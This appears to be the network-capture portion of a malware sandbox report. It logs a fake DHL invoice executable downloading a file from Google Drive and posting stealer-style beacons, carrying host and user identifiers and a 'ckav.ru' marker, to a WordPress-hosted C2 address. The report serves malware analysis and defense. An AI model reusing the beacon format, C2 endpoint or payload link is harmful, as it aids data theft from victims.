Aug 10, 2023 19:13:03.427922010 CEST	150	IN	Data Raw: 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 62 Data Ascii: ;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFFFFF;--wp--preset--color--pale-pink: #f78da
Aug 10, 2023 19:13:03.427975893 CEST	151	IN	Data Raw: 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 Data Ascii: 1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(1
Aug 10, 2023 19:13:03.428085089 CEST	152	IN	Data Raw: 67 2c 20 23 45 45 45 41 44 44 20 30 25 2c 20 23 44 31 44 31 45 34 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 67 72 65 65 6e 2d 74 6f 2d 79 65 6c 6c 6f 77 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 Data Ascii: g, #EEEADD 0%, #D1D1E4 100%);--wp--preset--gradient--green-to-yellow: linear-gradient(160deg, #D1E4DD 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-y
Aug 10, 2023 19:13:03.428138971 CEST	154	IN	Data Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 Data Ascii: wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap:
Aug 10, 2023 19:13:03.535186052 CEST	155	IN	Data Raw: 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 Data Ascii: in: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:w

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49833	216.128.145.196	80	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Timestamp	kBytes transferred	Direction	Data
Aug 10, 2023 19:13:03.684720039 CEST	160	OUT	POST /~wellseconds/?p=43026970 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 216.128.145.196 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E82E0162 Content-Length: 178 Connection: close
Aug 10, 2023 19:13:03.791256905 CEST	160	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: 'ckav.ruArthur841618W1064_038028278665D4ACB73EF64D459A9Uycg
Aug 10, 2023 19:13:04.683998108 CEST	161	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Aug 2023 17:13:03 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://216-128-145-196.cprapid.com/~wellseconds/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 65 6c 6c 20 53 65 63 6f 6e 64 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 5c 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 33 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 Data Ascii: <!doctype html><html lang="en-US" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page not found – Well Seconds</title><meta name='robots' content='noindex, nofollow' /><link rel='dns-prefetch' href='//216-128-145-196.cprapid.com' /><link rel="alternate" type="application/rss+xml" title="Well Seconds » Feed" href="http://216-128-145-196.cprapid.com/~wellseconds/feed/" /><link rel="alternate" type="application/rss+xml" title="Well Seconds » Comments Feed" href="http://216-128-145-196.cprapid.com/~wellseconds/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/216-128-145-196.cprapid.com\/~wellseconds\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.3"}};/*! This file
Aug 10, 2023 19:13:04.684021950 CEST	163	IN	Data Raw: 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 Data Ascii: is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.f
Aug 10, 2023 19:13:04.684159994 CEST	164	IN	Data Raw: 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f Data Ascii: o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports"
Aug 10, 2023 19:13:04.684180021 CEST	165	IN	Data Raw: 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 Data Ascii: ngExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n
Aug 10, 2023 19:13:04.684210062 CEST	167	IN	Data Raw: 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d Data Ascii: gn:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.
Aug 10, 2023 19:13:04.684222937 CEST	168	IN	Data Raw: 6f 63 6b 2d 67 72 6f 75 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69 Data Ascii: ock-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}
Aug 10, 2023 19:13:04.684283018 CEST	169	IN	Data Raw: 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 62 Data Ascii: ;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFFFFF;--wp--preset--color--pale-pink: #f78da
Aug 10, 2023 19:13:04.684413910 CEST	171	IN	Data Raw: 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 Data Ascii: 1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(1
Aug 10, 2023 19:13:04.684428930 CEST	172	IN	Data Raw: 67 2c 20 23 45 45 45 41 44 44 20 30 25 2c 20 23 44 31 44 31 45 34 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 67 72 65 65 6e 2d 74 6f 2d 79 65 6c 6c 6f 77 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 Data Ascii: g, #EEEADD 0%, #D1D1E4 100%);--wp--preset--gradient--green-to-yellow: linear-gradient(160deg, #D1E4DD 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-y
Aug 10, 2023 19:13:04.684441090 CEST	173	IN	Data Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 Data Ascii: wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap:
Aug 10, 2023 19:13:04.790899038 CEST	175	IN	Data Raw: 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 Data Ascii: in: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:w

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49835	216.128.145.196	80	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Timestamp	kBytes transferred	Direction	Data
Aug 10, 2023 19:13:04.980323076 CEST	182	OUT	POST /~wellseconds/?p=43026970 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 216.128.145.196 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E82E0162 Content-Length: 151 Connection: close
Aug 10, 2023 19:13:05.087743044 CEST	182	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur841618W1064_038028278665D4ACB73EF64D459A
Aug 10, 2023 19:13:05.976514101 CEST	183	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Aug 2023 17:13:05 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://216-128-145-196.cprapid.com/~wellseconds/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 65 6c 6c 20 53 65 63 6f 6e 64 73 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <!doctype html><html lang="en-US" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page not found – Well Seconds</title>
Aug 10, 2023 19:13:05.982523918 CEST	184	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 Data Ascii: <meta name='robots' content='noindex, nofollow' /><link rel='dns-prefetch' href='//216-128-145-196.cprapid.com' /><link rel="alternate" type="application/rss+xml" title="Well Seconds » Feed" href="http://216-128-145-196.cprapid.com/~we
Aug 10, 2023 19:13:05.982600927 CEST	186	IN	Data Raw: 3d 3d 3d 72 5b 74 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 66 6c 61 67 22 3a 72 65 74 75 72 6e 20 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 Data Ascii: ===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb
Aug 10, 2023 19:13:05.982659101 CEST	187	IN	Data Raw: 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 Data Ascii: peof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.c
Aug 10, 2023 19:13:05.982713938 CEST	188	IN	Data Raw: 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 Data Ascii: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-
Aug 10, 2023 19:13:05.982769012 CEST	190	IN	Data Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b Data Ascii: .wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-bl
Aug 10, 2023 19:13:05.982825041 CEST	191	IN	Data Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e Data Ascii: .wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:
Aug 10, 2023 19:13:05.982881069 CEST	192	IN	Data Raw: 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 Data Ascii: : #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--color--dark-gray: #28303D;--wp--preset--color--gray: #39414D;--wp--preset--color--green: #D1E4DD;--wp--preset--color--blue: #D1DFE
Aug 10, 2023 19:13:05.982937098 CEST	194	IN	Data Raw: 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 Data Ascii: eg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,1
Aug 10, 2023 19:13:05.982995033 CEST	195	IN	Data Raw: 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 45 34 44 31 44 31 20 30 25 2c 20 23 44 31 44 31 45 34 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 Data Ascii: linear-gradient(160deg, #E4D1D1 0%, #D1D1E4 100%);--wp--preset--font-size--small: 18px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 24px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--extra-small: 16px
Aug 10, 2023 19:13:06.084053040 CEST	197	IN	Data Raw: 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 Data Ascii: -left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-in

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49830	142.250.181.238	443	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-10 17:13:00 UTC	0	OUT	GET /uc?export=download&id=1RkYk72jHuXza_mEHkFaPldPXcTgoFYZE HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Host: drive.google.com Cache-Control: no-cache
2023-08-10 17:13:00 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 10 Aug 2023 17:13:00 GMT Location: https://doc-0s-3o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ca95q9srt742e8g9mee28t9fvcpi0rnq/1691687550000/04164905018868905653//1RkYk72jHuXza_mEHkFaPldPXcTgoFYZE?e=download&uuid=fd09c5b4-1c26-472b-8acd-937df6ec0e47 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-BJalMsI-y6tJtesec5J77w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version= Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: 